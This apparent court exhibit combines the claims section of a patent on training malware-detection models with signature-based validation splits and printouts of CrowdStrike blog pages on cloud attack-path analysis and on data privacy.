In some examples, at operation **1118**, the preparation module **224** determines a first subset **1120** of the candidate set **1006** and a second subset **1122** of the candidate set **1006** based at least in part on at least some of the signatures **1104** and on the predetermined difference criterion **1016**. Examples are discussed herein, e.g., with reference to the preparation module **224**. For example, the preparation module **224** can cluster data streams **1008** of the candidate set **1006** into the first subset **1120** and the second subset **1122** based on the signatures **1104** of those data streams **1008**. The preparation module **224** can then determine the training set **1002** comprising or consisting of the first subset **1120** and the validation set **1012** comprising or consisting of the second subset **1122**. Determining the subsets **1120** and **1122** in a coordinated manner can permit more effectively determining a validation set **1012** having desired characteristics, e.g., as discussed herein with reference to operation **1010**. In some examples, the signatures include locality-sensitive hash values, e.g., as discussed herein with reference to operation **1110**.

FIG. **12** is a dataflow diagram that illustrates an example process **1200** for determining CM(s), and related dataflow. In some examples, operation **1028** can include operations **1202**, **1206**, **1210**, or **1214**. In some examples, operation **1028** or operation **1214** can be followed by operation **1218**.

In some examples, at operation **1202**, the training module **226** (or the preparation module **224** or the operation module **228**, and likewise throughout the following discussion of operations **1202-1214**) determines a plurality of partitions **1204** of the training set **1002** based at least in part on the signatures **1114**. Each partition **1204** of the plurality of partitions **1204** can include or consist of at least one of the data streams **1004** of the training set **1002**. Examples are discussed herein, e.g., with reference to operation **902** and partitions **904**.

In some examples, at operation **1206**, the training module **226** provides individual partitions **1204** of the plurality of partitions **1204** to respective computing nodes **1208** of a plurality of computing nodes **1208** via a communications interface **232** communicatively connected with the processing unit(s) **210**. Examples are discussed herein, e.g., with reference to operation **910** and nodes **912**.

In some examples, at operation **1210**, the training module **226** receives respective results **1212** from individual computing nodes **1208** of the plurality of computing nodes **1208**. Examples are discussed herein, e.g., with reference to operation **916**, nodes **912**, and results **918**.

In some examples, at operation **1214**, the training module **226** updates the CM **1020** based at least in part on the results **1212** to provide updated CM **1216**. Examples are discussed herein, e.g., with reference to operations **414**, **814**, **920**, and **1028**.



In some examples, at operation **1218**, the operation module **228** operates the CM **1020** based at least in part on at least one trial data stream **1220** to provide a trial model output **1222**. The trial model output **1222** can indicate whether the trial data stream **1220** is associated with malware. Examples are discussed herein, e.g., with reference to operation **320** and trial model output **322**.

## EXAMPLE CLAUSES

A: A method comprising, under control of at least one processing unit: determining respective signatures of individual training data streams of a plurality of training data streams; determining, based at least in part on the signatures and a predetermined difference criterion, a training set comprising at least some of the plurality of training data streams and a validation set comprising at least some of the plurality of training data streams; determining a computational model based at least in part on the training set; and operating the computational model based at least in part on a trial data stream to provide a trial model output.

B: The method according to claim A, wherein the trial model output indicates whether the trial data stream is associated with malware.

C: The method according to claim A, wherein at least one of the plurality of training data streams comprises at least part of an executable file.

D: The method according to claim A, further comprising: determining the computational model by performing a supervised learning process using at least one training stream of the training set as training data; testing the computational model based at least in part on at least one validation stream of the validation set; and selectively updating the computational model based at least in part on a result of the testing.

E: The method according to claim D, wherein the computational model comprises at least one of: a neural network, a decision tree, or a tree ensemble.

F: The method according to claim A, further comprising determining the signatures as locality-sensitive hash (LSH) values associated with the respective training data streams.

G: The method according to claim F, further comprising: determining respective feature vectors of the individual training data streams; and determining the signatures as the LSH values of the respective feature vectors.

H: The method according to claim A, wherein: the method further comprises determining the validation set including validation streams of the plurality of training data streams that satisfy the predetermined difference criterion with respect to training stream(s) in the training set; and the predetermined difference criterion is defined with respect to the signatures.

I: The method according to claim A, further comprising: determining respective feature vectors of the individual training data streams; and determining the signatures based on the respective feature vectors.

J: The method according to claim A, further comprising determining at least one of the signatures as a hash of at least a portion of the respective training data stream.

K: The method according to claim A, further comprising: determining respective feature vectors of the individual training data streams; determining sparse LSH weight

vectors; and determining the signatures as the LSH values of the respective feature vectors based at least in part on the sparse LSH weight vectors.

L: The method according to claim A, further comprising: determining a plurality of partitions of the training set based at least in part on the signatures, wherein each partition of the plurality of partitions comprises at least one of the data streams of the training set; providing individual partitions of the plurality of partitions to respective computing nodes of a plurality of computing nodes via a communications interface communicatively connected with the processor; receiving respective results from individual computing nodes of the plurality of computing nodes; and determining the computational model based at least in part on the results.

M: A method comprising, under control of at least one processing unit: determining signatures of respective data streams; determining, based at least in part on the signatures, a training set comprising at least one of the data streams and a validation set comprising at least one of the data streams, wherein the respective signatures of a first data stream of the training set and a second data stream of the validation set satisfy a predetermined difference criterion; and determining a computational model based at least in part on the training set.

N: The method according to claim M, further comprising: determining respective feature vectors of at least some of the data streams; and determining the signatures comprising locality-sensitive hash (LSH) values of the respective feature vectors.

O: The method according to claim M, further comprising determining the signatures comprising respective dissimilarity values between the respective data streams and a common reference data stream of the data streams.

P: The method according to claim O, further comprising determining the signatures further comprising respective second dissimilarity values between the respective data streams and a common second reference data stream of the data streams.

Q: The method according to claim O, wherein at least one dissimilarity value comprises at least one of a Euclidean distance, an angular distance, or a Hamming distance.

R: The method according to claim M, further comprising: determining the computational model further based at least in part on a first hyperparameter value; operating the computational model based at least in part on at least some of the data streams of the validation set to provide respective model outputs; determining that the model outputs do not satisfy a predetermined completion criterion; and, in response, determining a second computational model based at least in part on the training set and a second, different hyperparameter value.

S: The method according to claim R, further comprising determining the second hyperparameter value based at least in part on at least one of: the first hyperparameter value; or at least one of the model outputs.

T: The method according to claim M, further comprising determining the validation set including individual data streams that satisfy the predetermined difference criterion with respect to at least some of the data streams in the training set.



U: The method according to claim M, wherein the training set is disjoint from the validation set.

V: The method according to claim M, further comprising: determining a plurality of partitions of the training set based at least in part on the signatures, wherein each partition of the plurality of partitions comprises at least one of the data streams of the training set; providing individual partitions of the plurality of partitions to respective computing nodes of a plurality of computing nodes via a communications interface communicatively connected with the processing unit; receiving respective results from individual computing nodes of the plurality of computing nodes; and determining the computational model based at least in part on the results.

W: The method according to claim V, further comprising determining a first partition of the plurality of partitions based at least in part on a predetermined similarity criterion, wherein the respective signatures of a majority of the data streams in the first partition satisfy the predetermined similarity criterion with respect to each other.

X: The method according to claim V, further comprising determining a first partition of the plurality of partitions based at least in part on a predetermined similarity criterion, wherein, for any majority of the data streams in the first partition, the respective signatures of the data streams in the majority do not satisfy the predetermined similarity criterion with respect to each other.

Y: The method according to claim V, wherein the providing comprises transmitting data of at least some of the individual partitions to the respective computing nodes via a network interface.

Z: The method according to claim M, further comprising: determining respective feature vectors of at least some of the data streams; determining sparse LSH weight vectors; and determining the signatures as the LSH values of the respective feature vectors based at least in part on the sparse LSH weight vectors.

AA: The method according to claim M, wherein the computational model comprises at least one of a neural network (NN), a decision tree, or a tree ensemble.

AB: The method according to claim M, further comprising, before determining the computational model, arranging the training set and the validation set in respective, different regions of a computer memory communicatively connected with the processor.

AC: A method comprising, under control of at least one processing unit: determining a validation set of data streams from a candidate set of data streams based at least in part on a training set of data streams and on a predetermined difference criterion between data streams; and operating a computational model based at least in part on data stream(s) of the validation set to provide respective model output(s); determining that the model output(s) do not satisfy a predetermined completion criterion; and, in response, updating the computational model based at least in part on data stream(s) of the training set to provide an updated computational model.

AD: The method according to claim AC, wherein: the predetermined difference criterion applies to at least two signatures and is satisfied by the at least two signatures having at least a predetermined threshold difference; and the method further comprises: determining respective signatures of at least some data streams of the candidate set; determining respective

signatures of at least some data streams of the training set; and selecting a first data stream of the candidate set for inclusion in the validation set in response to the respective signature of the first data stream satisfying the predetermined difference criterion with respect to the respective signature of at least one data stream of the training set.

AE: The method according to claim AD, further comprising: determining a feature vector associated with the first data stream; and determining the respective signature of the first data stream as a locality-sensitive hash (LSH) of the feature vector.

AF: The method according to claim AD, further comprising selecting the first data stream further based at least in part on the first data stream satisfying the predetermined difference criterion with respect to a majority of the respective signatures of the data streams of the training set.

AG: The method according to claim AD, further comprising: determining a feature vector associated with the first data stream; determining sparse LSH weight vectors; and determining the respective signature of the first data stream as a locality-sensitive hash (LSH) of the feature vector based at least in part on the sparse LSH weight vectors.

AH: The method according to claim AC, further comprising: determining respective signatures of at least some data streams of the candidate set; determining a first subset of the candidate set and a second subset of the candidate set based at least in part on at least some of the signatures and on the predetermined difference criterion; determining the training set comprising the first subset; and determining the validation set comprising the second subset.

AI: The method according to claim AH, wherein the training set and the validation set are disjoint.

AJ: The method according to claim AC, further comprising: determining a plurality of partitions of the training set based at least in part on the signatures, wherein each partition of the plurality of partitions comprises at least one of the data streams of the training set; providing individual partitions of the plurality of partitions to respective computing nodes of a plurality of computing nodes via a communications interface communicatively connected with the at least one processing unit; receiving respective results from individual computing nodes of the plurality of computing nodes; and updating the computational model based at least in part on the results.

AK: The method according to claim AC, further comprising: operating the updated computational model based at least in part on at least one trial data stream to provide a trial model output indicating whether the trial data stream is associated with malware.

AL: The method according to claim AC, wherein: the training set comprises at least some, but fewer than all, of the data streams of the candidate set; and the method further comprises, before updating the computational model, packing the training set of data streams in a processor-accessible memory.

AM: A computer-readable medium, e.g., a computer storage medium, having thereon computer-executable instructions, the computer-executable instructions upon execution configuring a computer to perform operations as any of paragraphs A-AL (e.g., A-L, M-AB, or AC-AL) recites.

AN: A device comprising: a processor; and a computer-readable medium, e.g., a computer storage medium, having thereon computer-executable instructions, the computer-executable instructions upon execution by the processor configuring the device to perform operations as any of paragraphs A-AL (e.g., A-L, M-AB, or AC-AL) recites.

AO: A system comprising: means for processing; and means for storing having thereon computer-executable instructions, the computer-executable instructions including means to configure the system to carry out a method as any of paragraphs A-AL (e.g., A-L, M-AB, or AC-AL) recites.

## CONCLUSION

Various computational-model determination and operation techniques described herein can permit more efficiently analyzing data, e.g., of a data stream, and more readily determining a signature or classification of the data stream. Various examples can reduce the time or memory requirements of software to determine signatures or classifications while maintaining or improving the accuracy of such determinations. Some examples herein permit classifying data streams unknown at the time of training, e.g., malware generated using a custom packer specific to that type of malware or the relevant adversary. Some examples provide signatures that can then be used by neural networks or other classifiers in determining classifications of unknown files. Some examples herein can provide improved accuracy of classification of malware within a malware family or across families. This can, in turn, permit more readily detecting and disabling newly-developed malware variants, e.g., polymorphic malware. Some examples are described with reference to malware, but techniques described herein are not limited to files associated with malware. For example, techniques used herein can be used to classify media files (e.g., audio, video, or image); productivity files (e.g., text documents or spreadsheets); data files (e.g., database indexes or tables); or other types of files.

Various examples herein can be used with a variety of types of data streams, including data streams that have been compiled or linked, assembled into distribution packages or script packages, combined into self-extractors or self-installers, packed, or encrypted, e.g., for content protection. Example trial data streams **116** that can be analyzed using computational models **112** as described herein include, but are not limited to, PE, ELF, Mach-O, JAR, or DEX executables, or any other executable formats; PNG, GIF, or other image formats; OGG, MP3, MP4, Matroska, or other audio or video container or bitstream formats; or traces of network traffic, e.g., headers or bodies of data packets in protocols such as IEEE 802.11, IP, UDP, or TCP. Example types of trial data streams **116** that can be analyzed using computational models **112** as described herein include, but are not limited to, executables, static libraries, dynamic libraries, data files, compressed files, encrypted files, or obfuscated files.

Although the techniques have been described in language specific to structural features and/or methodological acts, it is to be understood that the appended claims are not necessarily limited to the features and/or acts described. Rather, the features and acts are described as example implementations of such techniques. For example, network **108**, processing unit(s) **210**, and other structures described herein for which multiple types of implementing devices or struc-

tures are listed can include any of the listed types, and/or multiples and/or combinations thereof.

The operations of the example processes are illustrated in individual operations and summarized with reference to those operations. The processes are illustrated as logical flows of operations, each operation of which can represent one or more operations that can be implemented in hardware, software, and/or a combination thereof. In the context of software, the operations represent computer-executable instructions stored on one or more computer-readable media that, when executed by one or more processors, enable the one or more processors to perform the recited operations. Generally, computer-executable instructions include routines, programs, objects, modules, components, data structures, and the like that perform particular functions and/or implement particular abstract data types. The order in which the operations are described is not intended to be construed as a limitation, and any number of the described operations can be executed in any order, combined in any order, subdivided into multiple sub-operations, and/or executed in parallel to implement the described processes. The described processes can be performed by resources associated with one or more computing device(s) **102**, **104**, and/or **200** such as one or more internal and/or external CPUs and/or GPUs, and/or one or more pieces of hardware logic such as FPGAs, DSPs, and/or other types described above.

All of the methods and processes described above can be embodied in, and fully automated via, software code modules executed by one or more computers and/or processors. The code modules can be embodied in any type of computer-readable medium. Some and/or all of the methods can be embodied in specialized computer hardware. As used herein, the term "module" is intended to represent example divisions of the described operations (e.g., implemented in software or hardware) for purposes of discussion, and is not intended to represent any type of requirement or required method, manner or organization. Accordingly, while various "modules" are discussed, their functionality and/or similar functionality could be arranged differently (e.g., combined into a fewer number of modules, broken into a larger number of modules, etc.). Further, while certain functions and modules are described herein as being implemented by software and/or firmware executable on a processor, in other embodiments, any or all of the modules may be implemented in whole or in part by hardware (e.g., as an ASIC, a specialized processing unit, etc.) to execute the described functions. In some instances, the functionality and/or modules discussed herein may be implemented as part of the operating system **216**. In other instances, the functionality and/or modules may be implemented as part of a device driver, firmware, and so on.

The word "or" and the phrase "and/or" are used herein in an inclusive sense unless specifically stated otherwise. Accordingly, conjunctive language such as the phrases "X, Y, or Z," "at least X, Y, or Z," or "at least one of X, Y or Z," unless specifically stated otherwise, is to be understood as signifying that an item, term, etc., can be either X, Y, or Z, or a combination thereof. Conditional language such as, among others, "can," "could," "might" and/or "may," unless specifically stated otherwise, are understood within the context to present that certain examples include, while other examples do not include, certain features, elements and/or steps. Thus, such conditional language is not generally intended to imply that certain features, elements and/or steps are in any way required for one or more examples and/or that one or more examples necessarily include logic for deciding, with and/or without user input and/or prompting, whether certain features, elements and/or steps are included and/or are to be performed in any particular example.



Any routine descriptions, elements and/or blocks in the flow diagrams described herein and/or depicted in the attached figures should be understood as potentially representing modules, segments, and/or portions of code that include one or more computer-executable instructions for implementing specific logical functions and/or elements in the routine. Alternative implementations are included within the scope of the examples described herein in which elements and/or functions can be deleted and/or executed out of order from any order shown or discussed, including substantially synchronously and/or in reverse order, depending on the functionality involved as would be understood by those skilled in the art. Examples herein are nonlimiting unless expressly stated otherwise, regardless of whether or not they are explicitly described as being nonlimiting. It should be emphasized that many variations and modifications can be made to the above-described examples, the elements of which are to be understood as being among other acceptable examples. All such modifications and variations are intended to be included herein within the scope of this disclosure and protected by the following claims. Moreover, in the claims, any reference to a group of items provided by a preceding claim clause is a reference to at least some of the items in the group of items, unless specifically stated otherwise.

What is claimed is:

**1**. A method comprising, under control of at least one processing unit:

determining a validation set of data streams from a candidate set of data streams based at least in part on a training set of data streams and on a predetermined difference criterion between an individual data stream of the candidate set and an individual data stream of the training set; and

operating a computational model based at least in part on one or more data streams of the validation set to provide one or more respective model outputs;

determining that the one or more respective model output do not satisfy a predetermined completion criterion; and, in response,

updating the computational model based at least in part on one or more data streams of the training set to provide an updated computational model,

wherein the predetermined difference criterion applies to a first signature associated with the candidate set and a second signature associated with the training set, respectively, and is satisfied by the first signature and the second signature having at least a predetermined threshold difference.

**2**. The method according to claim **1**, further comprising:

determining respective signatures of at least some data streams of the candidate set;

determining respective signatures of at least some data streams of the training set; and

selecting a first data stream of the candidate set for inclusion in the validation set in response to the respective signature of the first data stream satisfying the predetermined difference criterion with respect to the respective signature of at least one data stream of the training set.

**3**. The method according to claim **2**, further comprising:

determining a feature vector associated with the first data stream; and

determining the respective signature of the first data stream as a locality-sensitive hash (LSH) of the feature vector.

**4**. The method according to claim **2**, further comprising selecting the first data stream further based at least in part on the first data stream satisfying the predetermined difference criterion with respect to a majority of the respective signatures of the data streams of the training set.

**5**. The method according to claim **2**, further comprising:

determining a plurality of partitions of the training set based at least in part on the respective signatures, wherein each partition of the plurality of partitions comprises at least one of the data streams of the training set;

providing individual partitions of the plurality of partitions to respective computing nodes of a plurality of computing nodes via a communications interface communicatively connected with the at least one processing unit;

receiving respective results from individual computing nodes of the plurality of computing nodes; and

updating the computational model based at least in part on the results.

**6**. The method according to claim **1**, further comprising:

determining respective signatures of at least some data streams of the candidate set;

determining a first subset of the candidate set and a second subset of the candidate set based at least in part on at least some of the respective signatures and on the predetermined difference criterion;

determining the training set comprising the first subset; and

determining the validation set comprising the second subset.

**7**. The method according to claim **1**, further comprising:

operating the updated computational model based at least in part on at least one trial data stream to provide a trial model output indicating whether the trial data stream is associated with malware.

**8**. A system comprising:

one or more processors; and

memory communicatively coupled to the one or more processors, the memory storing instructions executable by the one or more processors that, when executed by the one or more processors, cause the system to perform operations including:

determining a validation set of data streams from a candidate set of data streams based at least in part on a training set of data streams and on a predetermined difference criterion between an individual data stream of the candidate set and an individual data stream of the training set; and

operating a computational model based at least in part on one or more data streams of the validation set to provide one or more respective model outputs;

determining that the one or more respective model outputs do not satisfy a predetermined completion criterion; and, in response,

updating the computational model based at least in part on the one or more data streams of the training set to provide an updated computational model,

wherein the predetermined difference criterion applies to a first signature associated with the candidate set and a second signature associated with the training set, respectively, and is satisfied by the first signature and the second signature having at least a predetermined threshold difference.



**9**. The system according to claim **8**, wherein:

the instructions, when executed by the one or more processors, cause the system to perform operations further including:

determining respective signatures of at least some data streams of the candidate set;

determining respective signatures of at least some data streams of the training set; and

selecting a first data stream of the candidate set for inclusion in the validation set in response to the respective signature of the first data stream satisfying the predetermined difference criterion with respect to the respective signature of at least one data stream of the training set.

**10**. The system according to claim **9**, wherein the instructions, when executed by the one or more processors, cause the system to perform operations further including:

determining a feature vector associated with the first data stream; and

determining the respective signature of the first data stream as a locality-sensitive hash (LSH) of the feature vector.

**11**. The system according to claim **9**, wherein the instructions, when executed by the one or more processors, cause the system to perform operations further including:

selecting the first data stream further based at least in part on the first data stream satisfying the predetermined difference criterion with respect to a majority of the respective signatures of the data streams of the training set.

**12**. The system according to claim **9**, wherein the instructions, when executed by the one or more processors, cause the system to perform operations further including:

determining a plurality of partitions of the training set based at least in part on the respective signatures, wherein each partition of the plurality of partitions comprises at least one of the data streams of the training set;

providing individual partitions of the plurality of partitions to respective computing nodes of a plurality of computing nodes via a communications interface communicatively connected with the at least one processing unit;

receiving respective results from individual computing nodes of the plurality of computing nodes; and

updating the computational model based at least in part on the results.

**13**. The system according to claim **8**, wherein the instructions, when executed by the one or more processors, cause the system to perform operations further including:

determining respective signatures of at least some data streams of the candidate set;

determining a first subset of the candidate set and a second subset of the candidate set based at least in part on at least some of the respective signatures and on the predetermined difference criterion;

determining the training set comprising the first subset; and

determining the validation set comprising the second subset.

**14**. The system according to claim **8**, wherein the instructions, when executed by the one or more processors, cause the system to perform operations further including:

operating the updated computational model based at least in part on at least one trial data stream to provide a trial model output indicating whether the trial data stream is associated with malware.

**15**. A non-transitory computer-readable storage medium storing computer-readable instructions executable by one or more processors, that when executed by the one or more processors, cause the one or more processors to perform operations comprising:

determining a validation set of data streams from a candidate set of data streams based at least in part on a training set of data streams and on a predetermined difference criterion between an individual data stream of the candidate set and an individual data stream of the training set; and

operating a computational model based at least in part on one or more data streams of the validation set to provide one or more respective model outputs;

determining that the one or more respective model outputs do not satisfy a predetermined completion criterion; and, in response,

updating the computational model based at least in part on one or more data streams of the training set to provide an updated computational model,

wherein the predetermined difference criterion applies to a first signature associated with the candidate set and a second signature associated with the training set, respectively, and is satisfied by the first signature and the second signature having at least a predetermined threshold difference.

**16**. The non-transitory computer-readable storage medium according to claim **15**, wherein:

the instructions, when executed by the one or more processors, cause the one or more processors to perform operations further including:

determining respective signatures of at least some data streams of the candidate set;

determining respective signatures of at least some data streams of the training set; and

selecting a first data stream of the candidate set for inclusion in the validation set in response to the respective signature of the first data stream satisfying the predetermined difference criterion with respect to the respective signature of at least one data stream of the training set.

**17**. The non-transitory computer-readable storage medium according to claim **16**, wherein the instructions, when executed by the one or more processors, cause the one or more processors to perform operations further including:

determining a feature vector associated with the first data stream; and

determining the respective signature of the first data stream as a locality-sensitive hash (LSH) of the feature vector.

**18**. The non-transitory computer-readable storage medium according to claim **16**, wherein the instructions, when executed by the one or more processors, cause the one or more processors to perform operations further including:

selecting the first data stream further based at least in part on the first data stream satisfying the predetermined difference criterion with respect to a majority of the respective signatures of the data streams of the training set.

**19**. The non-transitory computer-readable storage medium according to claim **16**, wherein the instructions, when executed by the one or more processors, cause the one or more processors to perform operations further including:

determining a plurality of partitions of the training set based at least in part on the respective signatures, wherein each partition of the plurality of partitions comprises at least one of the data streams of the training set;

providing individual partitions of the plurality of partitions to respective computing nodes of a plurality of computing nodes via a communications interface communicatively connected with the at least one processing unit;

receiving respective results from individual computing nodes of the plurality of computing nodes; and

updating the computational model based at least in part on the results.

**20**. The non-transitory computer-readable storage medium according to claim **15**, wherein the instructions, when executed by the one or more processors, cause the one or more processors to perform operations further including:

determining respective signatures of at least some data streams of the candidate set;

determining a first subset of the candidate set and a second subset of the candidate set based at least in part on at least some of the respective signatures and on the predetermined difference criterion;

determining the training set comprising the first subset; and

determining the validation set comprising the second subset.

* * * * *

# APPENDIX Q

# How CrowdStrike Traces Attack Paths to Sensitive Data in the Cloud

## As identity abuse and misconfigurations fuel a rise in cloud breaches, defenders need more than visibility, they need a blueprint to stop attackers before they reach high-value data.

June 30, 2025 | Jay Flora | Cloud & Application Security



As organizations adopt hybrid and multi-cloud architectures, the attack surface quickly expands, often outpacing defender's ability to see and stop threats. This growing complexity fuels risk — creating blind spots adversaries exploit through cloud misconfigurations, excessive permissions, and unpatched vulnerabilities. These conditions allow attackers to break in, move laterally, and gain higher levels of access.

Identity and permission misuse has become central to modern adversary tradecraft. Valid account abuse has become the leading initial access vector to the cloud, accounting for 35% of cloud incidents in the first half of 2024, the CrowdStrike 2025 Global Threat Report states. Groups like SCATTERED SPIDER and LABYRINTH CHOLLIMA often begin with stolen credentials then escalate into cloud environments to exfiltrate business-critical data.

Attack Path Analysis, built into CrowdStrike Falcon® Cloud Security, reveals how adversaries can move through cloud environments and maps potential attack paths so teams can block them before a breach occurs. It uses vulnerability data from CrowdStrike Falcon® Exposure Management to trace lateral



capability delivers deeper context to help security teams uncover and eliminate risk with greater precision.

identifying where defenders should focus first. It highlights the attack paths that create the highest organizational risk based on asset sensitivity, exploitability, and complexity, including paths that terminate at resources storing sensitive data.

Each attack path includes detailed contributing factors such as exploitable vulnerabilities, identity misconfigurations, and overly permissive network settings. This consolidated view helps teams evaluate which paths pose the greatest risk to critical services and sensitive information. With this centralized view of potential attack paths, security teams can make more informed and confident decisions to strengthen their security posture.



Figure 1. Attack Path Analysis dashboard in the Falcon console (click to open in new window)

## Trace the Adversary's Movement

Attack Path Analysis maps how adversaries could move through the cloud by identifying the most exploitable path from an internet-exposed asset to a sensitive or privileged target.

As shown in Figure 2, these visual paths could show how a compromised cloud server could lead to the exposure of data-rich workloads, such as cloud storage buckets containing customer records or financial data.



Featured
Recent
Video
Category
Start Free Trial

By highlighting the path with the highest risk, Attack Path Analysis enables defenders to assess how risks extend across their cloud environment and then break key connections that could lead to

improve precision, Attack Path Analysis highlights predictors of attack, which are vulnerabilities that are most likely to be exploited based on real-world threat intelligence. These insights are prioritized by ExPRT.AI, a capability powered by Falcon Exposure Management that evaluates each issue using factors like exploitability, asset importance, and threat activity. By surfacing these risks directly within the attack path, security teams can focus on remediating the vulnerabilities most likely to lead to a breach.




## Prioritize and Remediate Threats

Attack Path Analysis doesn't just identify problems — it equips defenders with the steps needed to fix the problems fast. Security teams can quickly pinpoint high-impact remediation actions, including several low-effort options, to break attack chains before adversaries reach critical data or assets.

Within the Falcon console, teams are guided through clear, actionable steps to address the issues that would allow an adversary to traverse their environment. These actions may include tightening IAM policies, closing misconfigured ports, or patching critical vulnerabilities.



Figure 3. Guided remediation in the Falcon Cloud Security console (click to open in new window)

While Attack Path Analysis is built for proactive risk reduction, it also supports real-time response. This capability makes it easier to identify containment points and accelerate response to prevent damage. Defenders can isolate vulnerable assets using built-in actions, reducing the risk of data exfiltration across cloud and on-premises environments.



Figure 4. The Falcon console showing a containment action (click to open in new window)

Featured
Recent
Video
Category
Start Free Trial

or regulated data.

- Prioritized risk insights based on exploitability, asset sensitivity, and exposure to fix the most critical issues first

Attack Path Analysis gives security teams a powerful tool to reduce risk with targeted, context-driven remediation focused on preventing data compromise.

Falcon Cloud Security with Attack Path Analysis is built to protect not just infrastructure but the sensitive data adversaries are after. By combining visibility, prioritization, and guided remediation, Attack Path Analysis empowers security teams to stay ahead of threats, harden their hybrid environments, and prevent data theft before it happens.

### Additional Resources

- *Learn more about CrowdStrike Falcon Cloud Security.*
- *Learn more about CrowdStrike Falcon Exposure Management.*
- *See why Forrester named CrowdStrike a Leader in the Forrester Wave: Attack Surface Management Solutions.*
- *Contact us today to find out how Attack Path Analysis can help you identify, prioritize, and remediate risk — and ultimately, stop breaches before they happen.*

Tweet Share



CrowdStrike 2025 Thr
Adversaries weaponize a
Download re

### Related Content



**CrowdStrike Unveils Real-Time Cloud**



**Interaction with the Falcon Platform**

Case 2:25-cv-00098-JRG Document 67-3 Filed 03/31/26 Page 349 of 433 PageID #: 7659



## How Falcon ASPM Secures GenAI Applications and Lessons from Dogfooding

## CATEGORIES


| | |
|---|---|
| Artificial Intelligence | 46 |
| Cloud & Application Security | 137 |
| Data Protection | 18 |
| Endpoint Security & XDR | 331 |
| Engineering & Tech | 84 |
| Executive Viewpoint | 176 |
| Exposure Management | 110 |
| From The Front Lines | 197 |
| Next-Gen Identity Security | 62 |
| Next-Gen SIEM & Log Management | 108 |
| Public Sector | 40 |
| Small Business | 11 |
| Threat Hunting & Intel | 206 |


## CONNECT WITH US




FEATURED ARTICLES

October 01, 2024

CrowdStrike Named a Leader in 2024 Gartner® Magic Quadrant™ for Endpoint Protection Platforms
September 25, 2024

Featured
Recent
Video
Category
Start Free Trial

SUBSCRIBE

« CrowdStrike Named a Leader in the 2025 IDC MarketScape for CNAPP
Preventing Container Escape Attempts with Falcon Cloud Security's Enhanced Runtime Capabilities »

Case 2:25-cv-00098-JRG Document 67-3 Filed 03/31/26 Page 351 of 433 PageID #: 7661

CROWDSTRIKE | BLOG

## See CrowdStrike Falcon® in Action

Detect, prevent, and respond to attacks— even malware-free intrusions—at any stage, with next-generation endpoint protection.

See Demo

CROWDSTRIKE

Copyright © 2025 CrowdStrike | Privacy | Request Info | Blog | Contact Us | 1.888.512.8906 | Accessibility

# APPENDIX R

Cybersecurity 101: The Fundamentals of Cybersecurity > Introduction to Data Protection > Data Privacy

# DATA PRIVACY

SCHEDULE DEMO

Narendran Vaideeswaran - February 23, 2024

## What is data privacy?

**Data privacy**, also called information privacy, is an area of data protection that addresses the proper storage, access, retention, and security of sensitive data, which helps organizations meet regulatory requirements and protect the confidentiality and immutability of their data.

### What are types of sensitive data?

**Data privacy** is typically associated with:

- Personally identifiable information (PII) and protected health information (PHI)
  - **Examples:** Customer names, addresses, social security numbers, credit card numbers, and health information
- Valuable or confidential data
  - **Examples:** Financial data, operational data, intellectual property, and trade secrets

**Data privacy** is a subset of the broader data protection concept. Data privacy is a discipline intended to keep data safe against improper access, theft, or loss. And — especially where compliance oversight is a consideration — data privacy helps ensure proper use of personal data by giving individuals control over how their data is accessed, used, or shared.

The table below illustrates the scope, goal, and methods of data privacy:

| | |
|---|---|
| Scope | Focuses on how personal information is collected, processed, shared, and used by organizations, with an emphasis on protecting individuals' privacy rights. |
| **Goals** | To ensure that individuals have control over their personal data, promoting transparency, consent, and the responsible handling of information. |
| **Key Methods** | Implementing privacy policies, obtaining informed consent, practicing data minimization, conducting privacy impact assessments, and ensuring compliance with data regulatory standards. |


CrowdStrike 2025 Threat Hunting Report
Adversaries weaponize and target AI at scale.
Download report

## Importance of data privacy

In the digital business landscape, establishing and maintaining robust data privacy and protection practices is not merely a regulatory requirement but a strategic imperative. There are several compelling factors that underscore the critical importance of prioritizing data privacy in the corporate landscape.

### Adversaries targeting sensitive data

The pervasive threat of cyberattacks looms large over the global business ecosystem, transforming cybercrime into a highly lucrative enterprise estimated to cost the world a staggering $10.5 trillion annually by 2025. Unsurprisingly, financial motives stand as the driving force behind the vast majority of data breaches. A staggering 94.6% of data breaches are fueled by the pursuit of monetary gains, emphasizing the need for organizations to fortify their defenses against relentless adversaries seeking access to sensitive data.

### Cost of data breaches

The financial toll exacted by a single data breach is a harsh reality organizations must confront. On average, businesses incur a substantial cost of $4.45 million per breach. These expenses extend beyond immediate remediation efforts, encompassing legal ramifications, regulatory fines, and the daunting task of rebuilding customer trust. The significant financial consequences of a breach underscore why proactive investment in data privacy measures is not just a precautionary measure but a fiscally responsible business strategy.

### Impact on the organization

The repercussions of cybercriminals gaining access to sensitive data reverberate throughout the very fabric of an organization. Beyond the immediate financial losses, there is the potential for profound and lasting damage. The compromise of sensitive information can jeopardize intellectual property, diminish competitive edge, and tarnish an organization's reputation. The erosion of trust among clients and stakeholders is a fallout that can prove challenging to recover from, underscoring the critical need for organizations to champion data privacy as an integral aspect of their corporate responsibility.

## Data privacy benefits

In a digital age where data plays a pivotal role in business success and consumer trust, prioritizing data privacy offers a myriad of advantages, including:

1. **Business asset management:** Data is a critical asset for businesses, serving as the lifeblood that fuels various operations. Maintaining the privacy of this valuable resource enhances its integrity, reliability, and overall value to the organization.
2. **Brand trust:** Transparency in how businesses request consent, handle personal data, and adhere to privacy practices is vital for building and maintaining trust with customers. A strong commitment to data privacy contributes to a positive brand image and fosters customer loyalty. Customers are more likely to engage with businesses they trust to handle their data responsibly, leading to improved customer satisfaction and loyalty.
3. **Regulatory compliance:** Adhering to data privacy regulations ensures that organizations operate within the legal framework, avoiding potential fines and legal consequences. Compliance with international data privacy standards also facilitates smooth global expansion of business operations. It enables businesses to navigate diverse regulatory landscapes and engage with customers worldwide without encountering legal obstacles related to data handling and privacy.
4. **Lower data storage costs:** Implementing data privacy measures, such as data minimization and efficient storage practices, can lead to optimized data management. This reduces unnecessary storage costs associated with holding excessive or outdated information.
5. **Competitive advantage:** Demonstrating a strong commitment to data privacy can be a differentiator in the market. Consumers are becoming increasingly aware of the importance of their privacy, and businesses that prioritize and communicate their data protection efforts can gain a competitive edge.

### LEARN MORE

Learn how CrowdStrike empowers organizations of all different sizes to meet evolving regulatory requirements.
**Data Compliance With CrowdStrike** >

## Common data privacy laws and regulations

For organizations large and small, it's important to stay up to date on the latest data privacy laws. The following are examples of laws that aim to protect users' data privacy:

- The EU's General Data Protection Regulation (GDPR)
- The Health Insurance Portability and Accountability Act (HIPAA)
